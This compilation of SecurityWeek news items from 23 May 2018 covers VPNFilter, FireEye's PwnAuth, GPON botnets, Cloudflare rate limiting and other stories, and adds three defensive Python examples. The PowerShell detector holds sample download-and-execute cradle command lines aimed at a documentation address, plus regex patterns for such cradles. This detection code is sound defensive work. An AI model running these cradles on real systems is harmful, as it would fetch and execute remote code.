“This will redirect attempts by stage one of the malware to reinfect the device to an FBI-controlled server, which will capture the Internet Protocol (IP) address of infected devices, pursuant to legal process. A non-profit partner organization, The Shadowserver Foundation, will disseminate the IP addresses to those who can assist with remediating the VPNFilter botnet, including foreign CERTs and internet service providers (ISPs).”

The owners of compromised SOHO and NAS devices should reboot them as soon as possible: rebooting temporarily removes the second-stage malware and causes the first-stage malware to connect to the C&C domain for instructions.

“Although devices will remain vulnerable to reinfection with the second stage malware while connected to the Internet, these efforts maximize opportunities to identify and remediate the infection worldwide in the time available before Sofacy actors learn of the vulnerability in their command-and-control infrastructure.” continues the DoJ.

VPNFilter malware

Experts are particularly concerned by the destructive features implemented by the malware, which could allow attackers to render users’ devices unusable to cover their tracks.

Experts believe that such an attack could be launched by the threat actors during Ukraine’s Constitution Day celebrations; last year the NotPetya wiper attack was launched in the same period.

Both Justice and Cisco said they were releasing details of the problem before having found a strong, permanent fix. Justice said that by seizing control of one of the domains involved in running VPNFilter, it will give owners of infected routers a chance to reboot them, forcing them to begin communicating with the now-neutralized command domain.

The vulnerability will remain, Justice said, but the move will allow them more time to identify and intervene in other parts of the network.


FBI Inflated Numbers on Unhackable Devices
23.5.2018 securityweek BigBrothers

The FBI claimed it was unable to analyze roughly 7,700 devices last year due to strong encryption, but the actual number is likely much lower and the agency has admitted its mistake.

Over the past years, the FBI and some U.S. lawmakers have been pushing technology companies to find ways to provide law enforcement access to encrypted communications and information. However, tech firms and experts have warned that implementing backdoors could pose a serious risk and it would undermine the purpose of encryption.

In 2016, the FBI attempted to convince a judge to force Apple to hack into the iPhone of the man behind the 2015 terrorist attack in San Bernardino. The agency ultimately dropped the case after finding an alternative way to access the data on the phone, but it later came to light that the FBI was probably only trying to create legal precedent.

There are several companies, including Israel-based Cellebrite and US-based Grayshift, that claim to have the tools and skills needed to access nearly any locked device, including the latest iPhone X.

The FBI came under fire earlier this year after a report from the Department of Justice’s Office of the Inspector General (OIG) revealed that senior leaders within the agency were not happy that an alternative solution had been found for getting into the San Bernardino shooter’s phone.

The FBI has even set up a page on its official website dedicated to “Going Dark,” the term used to describe the inability to intercept and access communications and information due to technological factors.

Over the past months, FBI Director Christopher Wray repeatedly claimed that the agency had been unable to access data from nearly 7,800 devices in the previous fiscal year due to encryption. However, it has now come to light that the actual number of devices is only between 1,000 and 2,000, The Washington Post reported.

The FBI has admitted the error and blamed it on a flawed methodology introduced in April 2016, but insists that Going Dark is still a serious problem.

The Electronic Frontier Foundation (EFF) recently submitted a Freedom of Information Act (FOIA) request to learn more about this methodology and the FBI’s use of third-party solutions for bypassing encryption.

“Imposing an exceptional access mandate on encryption providers would be extraordinarily dangerous from a security perspective, but the government has never provided details about the scope of the supposed Going Dark problem,” said EFF’s Andrew Crocker. “The latest revision to Director Wray’s favorite talking point demonstrates that the case for legislation is even weaker than we thought.”


VMware Patches Fusion, Workstation Vulnerabilities
23.5.2018 securityweek Vulnerability

VMware informed customers on Monday that updates for its Fusion and Workstation products patch important denial-of-service (DoS) and privilege escalation vulnerabilities.

According to VMware, Fusion 10.x on macOS is impacted by a signature bypass flaw that can be exploited for local privilege escalation. The security hole, tracked as CVE-2018-6962, was discovered by a researcher from Chinese company Ant Financial. The issue has been fixed with the release of VMware Fusion 10.1.2.

VMware also revealed that Workstation 14.x on any platform and Fusion 10.x on macOS are impacted by several DoS vulnerabilities.

“VMware Workstation and Fusion contain multiple denial-of-service vulnerabilities that occur due to NULL pointer dereference issues in the RPC handler. Successful exploitation of these issues may allow an attacker with limited privileges on the guest machine to trigger a denial-of-service of their guest machine,” the company said in its advisory.

The flaw, identified as CVE-2018-6963, was reported to VMware by Hahna Latonick and Kevin Fujimoto through Trend Micro's Zero Day Initiative (ZDI), and independently by Bruno Botelho. The issue was addressed with the release of Workstation 14.1.2 and Fusion 10.1.2.

ZDI has yet to publish its advisories for the vulnerabilities found by Latonick and Fujimoto, but the company’s site shows that the issues were reported in mid-April.

VMware on Monday also published an advisory describing the impact of a recently uncovered speculative execution attack method on its products.

Researchers disclosed the details of two new issues, related to the Meltdown and Spectre attacks, that have been dubbed Variant 3a and Variant 4.

VMware says Variant 4, tracked as CVE-2018-3639, affects vSphere, Workstation and Fusion. Updates for these products enable Hypervisor-Assisted Guest mitigations for this vulnerability.

“vCenter Server, ESXi, Workstation, and Fusion update speculative execution control mechanism for Virtual Machines (VMs). As a result, a patched Guest Operating System (GOS) can remediate the Speculative Store bypass issue (CVE-2018-3639) using the Speculative-Store-Bypass-Disable (SSBD) control bit. This issue may allow for information disclosure in applications and/or execution runtimes which rely on managed code security mechanisms. Based on current evaluations, we do not believe that CVE-2018-3639 could allow for VM to VM or Hypervisor to VM Information disclosure,” VMware said.

Earlier this month, the company published an advisory informing customers that VMware NSX SD-WAN Edge by VeloCloud contains an unauthenticated command injection vulnerability. While the issue is potentially serious as it allows remote code execution, it has been assigned a severity rating of “important” as the impacted component is not enabled by default and it will be removed in future releases.


FireEye Launches OAuth Attack Testing Platform
23.5.2018 securityweek Safety

FireEye on Monday announced the availability of a platform that allows organizations and pentesters to check their ability to detect and respond to OAuth abuse attacks.

OAuth 2.0 is a protocol employed by major Internet companies, including Amazon, Google, Facebook, and Microsoft, to facilitate granting third-party applications access to user data. Using social engineering, attackers can trick victims into authorizing a third-party application to access their account, thus gaining access to all of the user's data without the need for credentials.

“In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders,” FireEye’s Doug Bienstock explains.

In an OAuth authorization flow, the third-party application requests a specific type of access to a user’s account; the API resource defines the sets of scopes that can be requested (similar to the permissions apps ask for on mobile devices).

An attacker looking to abuse OAuth can create a malicious application and then retrieve user data with the help of the obtained access tokens, via the API Resource. Access tokens don’t require a password, bypass any two-factor enforcement in place, and remain usable until access for the OAuth application is explicitly revoked.

An attacker can obtain OAuth tokens via social engineering, by convincing the victim to click a “Consent link” and approve the application. This is exactly what happened last year, when a phishing attack targeting Gmail users spread like a worm and tricked many users into allowing a malicious app named “Google Docs” to access their contact information.

Called PwnAuth, the newly launched web application framework should make it easier for organizations to test their ability to detect and respond to OAuth abuse campaigns.

“The web application provides penetration testers with an easy-to-use UI to manage malicious OAuth applications, store gathered OAuth tokens, and interact with API Resources. The application UI and framework are designed to be easily extendable to other API Resources through the creation of additional modules,” Bienstock notes.

Available on GitHub, the platform comes with a module to support malicious Office 365 applications capable of capturing OAuth tokens and using them to interact with the Microsoft Graph API. However, PwnAuth could be used to target any cloud environment that allows OAuth applications.

The available Office 365 module supports reading the mail messages, searching the user's mailbox, reading the user's contacts, downloading messages and attachments, searching OneDrive and downloading files, and sending messages on behalf of the user.

Using PwnAuth requires creating a Microsoft application first and then phishing potential victims. Once a victim clicks on the generated “Authorization URL,” PwnAuth captures the OAuth tokens, which can then be used to access their data. More detailed information on the platform’s usage can be found on the GitHub wiki.

Mitigations include training programs on social engineering and taking steps to diminish the impact of malicious OAuth applications by limiting API scopes they can request, disabling third-party apps within the organization, implementing application whitelisting, logging any user consent events, and querying an organization's user base for all consented applications, the researcher says.
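The last two mitigations, logging consent events and inventorying consented applications, are where a defender actually catches a consent-phishing app. The following is an added example (not FireEye's or PwnAuth's code) that triages constructed consent-grant events: it weights the requested Microsoft Graph scopes (the scope names are real, the weights and the event layout are this example's own assumptions), penalizes unverified publishers and names that imitate first-party products, and builds the per-user inventory of consented apps.

```python
"""Triage OAuth consent-grant events for signs of a consent-phishing application."""
from collections import defaultdict

# Microsoft Graph delegated permission names (real scope names); the risk weights are
# this example's own assumption, not vendor guidance.
SCOPE_RISK = {
    "User.Read": 0,
    "offline_access": 1,      # refresh token: access persists after the user logs out
    "Contacts.Read": 2,
    "Mail.Read": 3,
    "Files.Read.All": 4,
    "Mail.ReadWrite": 4,
    "Files.ReadWrite.All": 5,
    "Mail.Send": 5,           # send mail as the user: lets a lure spread to contacts
}
UNVERIFIED_PUBLISHER_PENALTY = 3
# First-party product names a lure app may imitate (the 2017 campaign posed as "Google Docs").
IMPERSONATED_NAMES = {"google docs", "microsoft office", "onedrive", "outlook"}

# Constructed consent events; the field layout is simplified and is not any vendor's audit format.
SAMPLE_CONSENTS = [
    {"time": "2018-05-21T09:14:02Z", "user": "alice@example.com", "app_name": "Contoso Expense",
     "app_id": "00000000-0000-0000-0000-000000000001", "publisher_verified": True,
     "scopes": ["User.Read", "offline_access"]},
    {"time": "2018-05-21T09:20:45Z", "user": "bob@example.com", "app_name": "Google Docs",
     "app_id": "00000000-0000-0000-0000-000000000002", "publisher_verified": False,
     "scopes": ["User.Read", "Mail.Read", "Mail.Send", "Contacts.Read",
                "Files.Read.All", "offline_access"]},
    {"time": "2018-05-21T10:02:11Z", "user": "carol@example.com", "app_name": "Calendar Sync",
     "app_id": "00000000-0000-0000-0000-000000000003", "publisher_verified": False,
     "scopes": ["User.Read", "Mail.Read"]},
]


def score_consent(event):
    """Return (score, reasons) for one consent-grant event."""
    reasons, score = [], 0
    for scope in event["scopes"]:
        weight = SCOPE_RISK.get(scope, 2)  # unknown scopes get a moderate default weight
        if weight:
            score += weight
            reasons.append(f"scope {scope} (+{weight})")
    if not event["publisher_verified"]:
        score += UNVERIFIED_PUBLISHER_PENALTY
        reasons.append("unverified publisher")
    if event["app_name"].strip().lower() in IMPERSONATED_NAMES:
        score += 3
        reasons.append("app name imitates a first-party product")
    scopes = set(event["scopes"])
    if "Mail.Send" in scopes and "offline_access" in scopes:
        reasons.append("can send mail as the user indefinitely (worm-capable)")
    return score, reasons


def severity(score):
    """Map a score to a triage bucket (thresholds are this example's assumption)."""
    if score >= 10:
        return "high"
    if score >= 4:
        return "medium"
    return "low"


def triage(events):
    """Rank consent events; each finding names the user, the app and why it was flagged."""
    findings = []
    for ev in events:
        score, reasons = score_consent(ev)
        findings.append({"user": ev["user"], "app_name": ev["app_name"], "app_id": ev["app_id"],
                         "score": score, "severity": severity(score), "reasons": reasons})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


def consented_apps_by_user(events):
    """Inventory of which apps each user has consented to (the query the mitigations call for)."""
    inventory = defaultdict(set)
    for ev in events:
        inventory[ev["user"]].add(ev["app_name"])
    return {user: sorted(apps) for user, apps in inventory.items()}


if __name__ == "__main__":
    for f in triage(SAMPLE_CONSENTS):
        print(f["severity"].upper(), f["user"], f["app_name"], "|", "; ".join(f["reasons"]))
```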

“OAuth abuse attacks are a dangerous and non-traditional phishing technique that attackers can use to gain access to an organization's confidential data. As we move more services to the cloud, organizations should be careful to lock down third-party application access and ensure that their monitoring and detection strategy covers application consent grants. Organizations and security professionals can use PwnAuth to test their ability to detect and respond to this new type of attack,” Bienstock concludes.


Botnets Target Zero-Days in GPON Routers
23.5.2018 securityweek BotNet

Two unpatched vulnerabilities in Dasan’s Gigabit-capable Passive Optical Network (GPON) routers are being exploited by Internet of Things (IoT) botnets, security researchers warn.

Tracked as CVE-2018-10561 and CVE-2018-10562, the two vulnerabilities were publicly disclosed in early May and impact hundreds of thousands of devices. The flaws can be exploited remotely, providing an attacker with full control of the impacted devices.

South Korea-based Dasan Networks hasn’t released a fix for these issues as of now, yet the first attempts to exploit the bugs were registered within days after the disclosure. An unofficial patch for the bugs was made available a couple of weeks back.

Last week, Fortinet alerted on Wicked, a new variant of Mirai that has added exploits for the GPON vulnerabilities to its arsenal. The security firm also revealed that a botnet iteration called Omni was being dropped onto the compromised devices.

According to researchers from Qihoo 360 Netlab, there were five botnets targeting the two GPON vulnerabilities last week, namely Hajime, Mettle, Mirai, Muhstik, and Satori.

Now, the security researchers reveal that an older botnet called TheMoon has joined the GPON party as well. Active since at least 2014, the botnet integrated at least 6 different IoT exploits last year and appears to continue to evolve.

“A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day. And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose not to disclose the attack payload details,” Netlab notes.

Trend Micro also reports Mirai-like scanning activity in Mexico, with GPON routers being the target. This is unsurprising, given that most of the Internet-exposed Dasan routers affected by the two flaws are located in Mexico, Kazakhstan, and Vietnam.

“Unlike the previous activity, the targets for this new scanning procedure are distributed. However, based on the username and password combinations we found in our data, we concluded that the target devices still consist of home routers or IP cameras that use default passwords,” Trend Micro notes.

However, the attacks also attempt to compromise the targeted devices using vulnerabilities, the security firm notes. A downloading script is used to fetch malware variants for four different architectures, namely ARM, ARMv7, MIPS and MIPS little-endian, common architectures in embedded and IoT devices.


Attackers Hide in Plain Sight as Threat Hunting Lags: Report
23.5.2018 securityweek Cyber

CISO Survey Shows the Importance of Threat Hunting in the Finance Sector

The finance sector has one of the most robust cybersecurity postures in industry. It is heavily regulated, frequently attacked, and well-resourced -- but not immune to cybercriminals. Ninety percent of financial institutions were targeted by ransomware alone in the past 12 months.

Endpoint protection firm Carbon Black surveyed the CISOs of 40 major financial institutions during April 2018 to understand how the finance sector is attacked and what concerns its defenders. Two things most stand out: nearly half (44%) of financial institutions are concerned about the security posture of their technology service providers (TSPs -- the supply chain); and despite their resources, only 37% have established threat hunting teams.

Concern over the supply chain is not surprising. Cybercriminals are increasingly attacking third-parties (who may be less well-protected or have their own security issues) to gain access to the primary target. The Federal Deposit Insurance Corporation (FDIC) is also concerned about the supply chain, and has developed an examination process that includes reviewing public information about the TSPs and their software.

One of the areas that concerns the FDIC is consolidation within the service provider industry. "For example," it notes, "a flawed acquisition strategy may weaken the financial condition of the acquirer, or a poorly planned integration could heighten operational or security risk."

Carbon Black recommends that this potential risk be countered by hunt teams and defenders closely assessing their TSP security posture. But, it adds, "Given that 63% of financial institutions have yet to establish threat hunting teams, there should be concern regarding limited visibility into exposure created by TSPs."

But it also considers threat hunting to be important in detecting direct attacks. There are two primary reasons. The first is the increasing tendency for attackers to use fileless attacks that are not easily detected by standard technology; and the second is a growing willingness for attackers to engage in counter-countermeasures; that is, to counter the defender's incident response.

Fileless attacks are increasing across all industry sectors. A typical attack might involve a Flash vulnerability. Flash invokes PowerShell, feeding instructions via the command line. PowerShell then connects to a stealth C&C server, from where it downloads a more extensive PowerShell script that performs the attack. All of this is done in memory -- no malware file is downloaded and there is nothing for traditional technology defenses to detect.
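The chain above leaves no file to scan, but it does leave process-creation telemetry: a browser or plugin host spawning PowerShell, a hidden window, an encoded or download-and-execute command line. The following is an added example (not Carbon Black's code) that scores constructed Sysmon-style events against those traits; the event layout, the parent-process list, the weights and the 203.0.113.5 documentation address are this example's own assumptions, and the encoded sample is built in the block so the decoder path is exercised.

```python
"""Flag PowerShell launches that fit the in-memory attack chain described above."""
import base64
import re

# Parents that should not normally spawn a script host: browsers, plugin hosts, Office apps.
INTERNET_FACING_PARENTS = {
    "chrome.exe", "firefox.exe", "iexplore.exe", "plugin-container.exe",
    "flashplayerplugin_32.exe", "winword.exe", "excel.exe", "acrord32.exe",
}
# Idioms for fetching and running code without writing a file to disk.
CRADLE_RE = re.compile(
    r"downloadstring|downloaddata|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|frombase64string",
    re.I)
# -EncodedCommand and its abbreviations, followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Switches that hide the console or skip profile loading.
STEALTH_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-noni\b|-noninteractive", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text) or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event):
    """Score one process-creation event; returns severity, reasons and any decoded payload."""
    reasons, score = [], 0
    image, parent, cmdline = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    if not image.startswith("powershell"):
        return {"severity": "none", "reasons": [], "decoded": None}
    decoded = decode_encoded_command(cmdline)
    # Inspect the decoded payload as well as the raw command line.
    text = cmdline + ("\n" + decoded if decoded else "")
    if parent in INTERNET_FACING_PARENTS:
        score += 3
        reasons.append(f"PowerShell spawned by {parent}")
    if decoded is not None:
        score += 2
        reasons.append("encoded command line")
    if CRADLE_RE.search(text):
        score += 3
        reasons.append("in-memory download/execute cradle")
    if STEALTH_RE.search(cmdline):
        score += 1
        reasons.append("hidden window / no profile")
    sev = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return {"severity": sev, "reasons": reasons, "decoded": decoded}


def _encode_ps(script):
    """Build a constructed -EncodedCommand value the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed events in a simplified Sysmon-like shape; 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    {"parent": "chrome.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc "
                + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")},
    {"parent": "FlashPlayerPlugin_32.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.5/s')\""},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service"},
]


def triage(events):
    """Assess every event, keeping the parent name for the analyst."""
    return [dict(parent=e["parent"], **assess(e)) for e in events]


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["severity"].upper(), r["parent"], "|", "; ".join(r["reasons"]))
```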

"Active threat hunting," says Carbon Black, "puts defenders 'on the offensive' rather than simply reacting to the deluge of daily alerts." It "aims to find abnormal activity on servers and endpoints that may be signs of compromise, intrusion or exfiltration of data. Though the concept of threat hunting isn't new, for many organizations the very idea of threat hunting is."

But the need for threat hunting goes beyond simple detection of intrusion. "Attackers are able to go off their scripts while defenders are sticking to manual and automated playbooks," warns Carbon Black. "These playbooks are generally based off simple indicators of compromise (IoCs). As a result, security teams are often left thinking they have disrupted the attacker but, with counter incident response, attackers maintain the upper hand."

Compounding this, attackers are beginning to incorporate a secondary command and control in case one is discovered or disrupted. Carbon Black notes that this tactic has already been found in 10% of victims, and predicts it is a tactic that will grow in future months. The principle is that an attacker’s ability to improvise and change direction at speed is best countered by a human defender rather than simply a pre-programmed set of incident response steps.

"Financial institutions," suggests Carbon Black, "should aim to improve situational awareness and visibility into the more advanced attacker movements post breach. This must be accompanied with a tactical paradigm shift from prevention to detection. The increasing attack surface, coupled with the utilization of advanced tactics, has allowed attackers to become invisible. Decreasing dwell time is the true return on investment for any cybersecurity program."

In reality, of course, this does not just apply to the finance sector. The same evolving methodology is being used by attackers across all industry sectors. The need for threat hunting is not limited to finance. "All sectors should take heed," Carbon Black chief cybersecurity officer Tom Kellermann told SecurityWeek. "Generally speaking, financial services tend to be the most secure as they've come under attack with high-profile attack campaigns in recent years." The implication is that if the finance sector is slow to switch to active threat hunting, other sectors will be slower.

In April 2018, Carbon Black filed an S-1 registration statement with the U.S. Securities and Exchange Commission (SEC) for a proposed initial public offering (IPO) of its common stock. Shares of the company (NASDAQ: CBLK) jumped 26% on its first day of trading on May 4. The company has a market capitalization of nearly $1.6 billion at the time of publishing. The company emerged in its current form after its purchase by Bit9 in February 2014.


Activists Urge Amazon to Drop Facial Recognition for Police
23.5.2018 securityweek Privacy

More than 30 activist groups led by the American Civil Liberties Union urged Amazon Tuesday to stop providing facial recognition technology to law enforcement, warning that it could give authorities "dangerous surveillance powers."

The organizations sent a letter to Amazon after an ACLU investigation found Amazon had been working with a number of US law enforcement agencies to deploy its artificial intelligence-powered Rekognition service.

"Rekognition marketing materials read like a user manual for authoritarian surveillance," said Nicole Ozer of the ACLU of California.

"Once a dangerous surveillance system like this is turned against the public, the harm can't be undone."

A letter to Amazon chief Jeff Bezos was signed by groups including the Electronic Frontier Foundation, Black Lives Matter, Freedom of the Press Foundation and Human Rights Watch.

"Amazon Rekognition is primed for abuse in the hands of governments," the letter said.

"This product poses a grave threat to communities, including people of color and immigrants, and to the trust and respect Amazon has worked to build."

Amazon is one of many companies in the US and elsewhere which deploy facial recognition for security and law enforcement.

Some research has indicated that such programs can be error-prone, particularly when identifying people of color, and activists argue these systems can build up large databases of biometric information which can be subject to abuse.

In China, authorities have created a digital surveillance system able to use a variety of biometric data -- from photos and iris scans to fingerprints -- to keep close tabs on the movements of the entire population, and use it to publicly identify lawbreakers and jaywalkers.

The ACLU released documents showing correspondence with police departments in Florida, Arizona and other states on Rekognition, which is a service of Amazon Web Services.

The US activist groups say a large deployment by Amazon, which is one of the leaders in artificial intelligence, could lead to broad surveillance of the US population.

"People should be free to walk down the street without being watched by the government," the letter said.

"Facial recognition in American communities threatens this freedom. In overpoliced communities of color, it could effectively eliminate it. The federal government could use this facial recognition technology to continuously track immigrants as they embark on new lives."

Amazon did not immediately respond to an AFP request for comment on the letter.


Cloudflare Improves DDoS Mitigation Tool
23.5.2018 securityweek Safety

Cloudflare announced a series of improvements to its Rate Limiting distributed denial of service (DDoS) protection tool this week.

Over the past six months, the company has observed an uptick in application (Layer 7) based DDoS attacks and also noticed that the assaults aren’t using huge payloads (volumetric attacks), but rely on a high number of requests per second to exhaust server resources (CPU, Disk and Memory). Attacks with over 1 million requests per second are a common thing, Cloudflare says.

Launched by the web infrastructure company a year ago, the Rate Limiting feature helps customers protect their web applications and APIs from various attacks, including DDoS, credential stuffing and content scraping.

In addition to the previously available Block and Simulate options, the tool now provides customers with Cloudflare JavaScript Challenge and Google reCaptcha (Challenge) mitigation actions available in the UI and API. Additionally, the company claims to have made Rate Limiting more dynamically scalable.

“A new feature has been added which allows Rate Limiting to count on Origin Response Headers for Business and Enterprise customers. The way this feature works is by matching attributes which are returned by the Origin to Cloudflare,” the web protection company notes.

For the credential stuffing protection, for example, Cloudflare customers can set a single rule (a Basic rate limit) or multiple rules (Advanced limits) to prevent abuse, depending on their needs. This ensures that only users (which typically enter a wrong password three times before hitting the recovery option) log in, and not bots (which go through thousands of credential combinations to see what works).

“With this type of tiering, any genuine users that are just having a hard time remembering their login details whilst also being extremely fast typers will not be fully blocked. Instead, they will first be given an automated JavaScript challenge followed by a traditional CAPTCHA if they hit the next limit. This is a much more user-friendly approach while still securing your login endpoints,” Cloudflare points out.

Cloudflare’s tool also includes a new origin headers feature that allows customers to configure their origin to respond with a header to trigger a rate-limit. A header is generated at the origin, and added to the response to Cloudflare.

“As we are matching on a static header, we can set a severity level based on the content of the Header. For example, if it was a repeat offender, you could respond with High as the Header value, which could Block for a longer period,” Cloudflare explains.

Rate Limiting can also protect from the increasingly popular enumeration attacks, the company says. Such assaults rely on identifying an expensive operation in an app and then overloading it to exhaust resources and slow or crash the app.

To fend off such attacks, one can set a rate limit on the 404 (page not found) responses the app returns when a queried user is not found. If the threshold of 404s is crossed within a given period of time, the app can be set to challenge the client to prove they are a real person.

To mitigate content scraping, Rate Limiting includes support for rules that distinguish between users who browse heavily and bots attempting to copy content for redistribution or reuse. The tool counts the number of requests to each endpoint and the number of hits to the image store, as well as the number of served 404 and 403 pages.
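To make the tiering, origin-header and 404-enumeration behaviour described above concrete, here is an added example (not Cloudflare's code) of a sliding-window limiter that escalates a login endpoint from JavaScript challenge to CAPTCHA to block, counts 404 responses per client, and honours a severity header returned by the origin. The thresholds, the client addresses and the header name X-RL-Severity are this example's own assumptions.

```python
"""Tiered rate limiting: login escalation, 404-based enumeration control, origin-signalled severity."""
from collections import defaultdict, deque

WINDOW = 60  # seconds; every counter below is a sliding window of this length

# Escalating login limits: (requests allowed per WINDOW, action once exceeded). Constructed values.
LOGIN_TIERS = [(5, "js_challenge"), (10, "captcha"), (20, "block")]
# Enumeration control: a burst of 404s from one client earns a CAPTCHA.
NOT_FOUND_LIMIT, NOT_FOUND_ACTION = 15, "captcha"
# Hypothetical origin response header through which the origin escalates a client.
SEVERITY_HEADER = "X-RL-Severity"
BLOCK_SECONDS = {"Low": 60, "High": 600}   # a repeat offender is blocked for longer
ORDER = ["allow", "js_challenge", "captcha", "block"]


def escalate(a, b):
    """Return the stricter of two actions."""
    return a if ORDER.index(a) >= ORDER.index(b) else b


class RateLimiter:
    def __init__(self):
        self.login_hits = defaultdict(deque)     # client -> timestamps of /login requests
        self.notfound_hits = defaultdict(deque)  # client -> timestamps of 404 responses
        self.blocked_until = {}                  # client -> time a severity block expires

    @staticmethod
    def _count(dq, now):
        """Record one hit and return how many fall inside the current window."""
        dq.append(now)
        while dq and now - dq[0] >= WINDOW:
            dq.popleft()
        return len(dq)

    def decide(self, client, path, status, now, origin_headers=None):
        """Return allow / js_challenge / captcha / block for this request.

        status and origin_headers describe the origin's response to the request; the counts
        they feed affect this decision and the client's following requests."""
        if self.blocked_until.get(client, 0) > now:
            return "block"
        action = "allow"
        if path == "/login":
            n = self._count(self.login_hits[client], now)
            for threshold, tier_action in LOGIN_TIERS:
                if n > threshold:
                    action = escalate(action, tier_action)
        if status == 404 and self._count(self.notfound_hits[client], now) > NOT_FOUND_LIMIT:
            action = escalate(action, NOT_FOUND_ACTION)
        sev = (origin_headers or {}).get(SEVERITY_HEADER)
        if sev in BLOCK_SECONDS:
            self.blocked_until[client] = now + BLOCK_SECONDS[sev]
            action = "block"
        return action


def simulate_login_burst(n, start=0):
    """Actions returned for n failed logins from one client, one per second."""
    rl = RateLimiter()
    return [rl.decide("198.51.100.9", "/login", 401, start + i) for i in range(n)]


def simulate_enumeration(n):
    """Actions returned for n probes of non-existent users, one per second."""
    rl = RateLimiter()
    return [rl.decide("198.51.100.10", f"/users/{i}", 404, i) for i in range(n)]


if __name__ == "__main__":
    print("login burst:", simulate_login_burst(21))
    print("enumeration:", simulate_enumeration(16))
```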

Cloudflare also decided to increase the number of available rules for Pro and Business customers, for no additional charge. Thus, Pro plans now include 10 rules, while Business plans include 15 rules.


U.S. Lawmakers Denounce Purported ZTE Deal
23.5.2018 securityweek BigBrothers

The United States and China have a tentative deal to save embattled Chinese telecom company ZTE, days after the two nations announced a truce in their trade standoff, The Wall Street Journal reported Tuesday.

The report sparked an immediate negative reaction on Capitol Hill, where top Republican and Democrat senators denounced it.

Details remain to be hammered out, but according to the general outlines of the agreement, Washington would lift a crippling ban on selling US components to the company, which in turn would make major changes in its management, executive board and possibly pay additional fines, according to the report.

The company had faced collapse due to the US ban, which resulted from its violations of US sanctions against Iran and North Korea.

Washington and Beijing on Saturday called a halt to a spiraling trade dispute sparked by US accusations of unfair trade practices and the alleged theft of US technology, suspending plans to impose tariffs on as much as $150 billion in Chinese imports.

In a series of tweets, top Republican Senator Marco Rubio of Florida, who chairs a key subcommittee on foreign relations, denounced the move, vowing lawmakers would work on "veto-proof legislation" to stop the deal.

"If this is true, then the administration has surrendered to #China on #ZTE," Rubio wrote.

"Making changes to their board & a fine won't stop them from spying & stealing from us."

Minority Leader Chuck Schumer, Democrat of New York, said the proposed arrangement would "do nothing to protect American national or economic security and are simply a diversion from the fact that we have lost."

- Mnuchin on the Hill -

Schumer said in a statement the White House and Treasury Secretary Steven Mnuchin had been duped by China.

"President Xi has played President Trump and Secretary Mnuchin."

ZTE was fined $1.2 billion in March 2017 but last month it was prohibited from receiving needed US parts after the Commerce Department found the company had lied multiple times and failed to take actions against employees responsible for sanctions violations on Iran and North Korea.

Trump has also faced accusations of quid-pro-quo after pledging to soften sanctions on ZTE just days after AFP reported a Chinese state firm would pour cash into a Trump-tied real estate venture.

According to media reports, lawmakers were incensed last week by Trump's offer to rescue the company, which came via Twitter in the midst of the China trade talks. The president angrily denied back-pedaling.

And in testimony before the Senate on Tuesday, Mnuchin said the administration's primary goal was safeguarding US interests and denied any quid pro quo.

"The objective was not to put ZTE out of business. The objective was to make sure they abide by our sanctions programs," Mnuchin said.

"I can assure you anything that they consider will take into account the very important national security issues and those will be addressed."

Mnuchin defended Trump's trade policy, saying he has been "more aggressive than any previous president ever," and is not looking for "short-term gains" but to "create a level playing field and make sure US technology is protected."

The administration's trade actions, together with efforts to reduce business regulation and the recent massive tax cut, already are impacting the economy, Mnuchin said.

He said GDP "could surprise on the upside very significantly" this year with growth of three percent or more.

Many economists see economic growth this year of close to that level, but expect it to slow in 2019 and beyond.


Critical Flaw Impacts Dell EMC RecoverPoint
23.5.2018 securityweek Vulnerability

Several security flaws were recently found in Dell EMC RecoverPoint, including a Critical remote code execution vulnerability, security firm Foregenix reveals.

Researchers from Foregenix found a total of six security issues impacting all versions of Dell EMC RecoverPoint prior to 5.1.2, as well as RecoverPoint for Virtual Machines prior to 5.1.1.3.

The flaws were reported to Dell in February, but the company released an update only last week, and it addressed only some of the bugs. The fixes are available through Dell EMC support.

Of the six vulnerabilities, only three received CVE numbers to date. These include CVE-2018-1235 (CVSS 9.8, Critical severity), CVE-2018-1242 (CVSS 6.7, Medium severity), and CVE-2018-1241 (CVSS 6.2, Medium severity).

The most important of the issues allows an unauthenticated remote attacker to execute arbitrary code with root privileges via an unspecified attack vector.

“The critical vulnerability allows unauthenticated remote code execution with root privileges. This means, that if an attacker with no knowledge of any credentials has visibility of RecoverPoint on the network, or local access to it, they can gain complete control over the RecoverPoint and its underlying Linux operating system,” Foregenix reveals.

The security researchers note that, once they gained complete control over the impacted device, they could exploit other unpatched vulnerabilities “to pivot and gain control of the Microsoft Active Directory network that the RecoverPoints were integrated with.”

The second newly discovered flaw is an administrative menu arbitrary file read, which could allow an attacker with access to the boxmgmt administrative menu to read files from the file system (which are accessible to the boxmgmt user).

In certain conditions, RecoverPoint leaks plaintext Lightweight Directory Access Protocol credentials into the Tomcat log file, the security firm says.

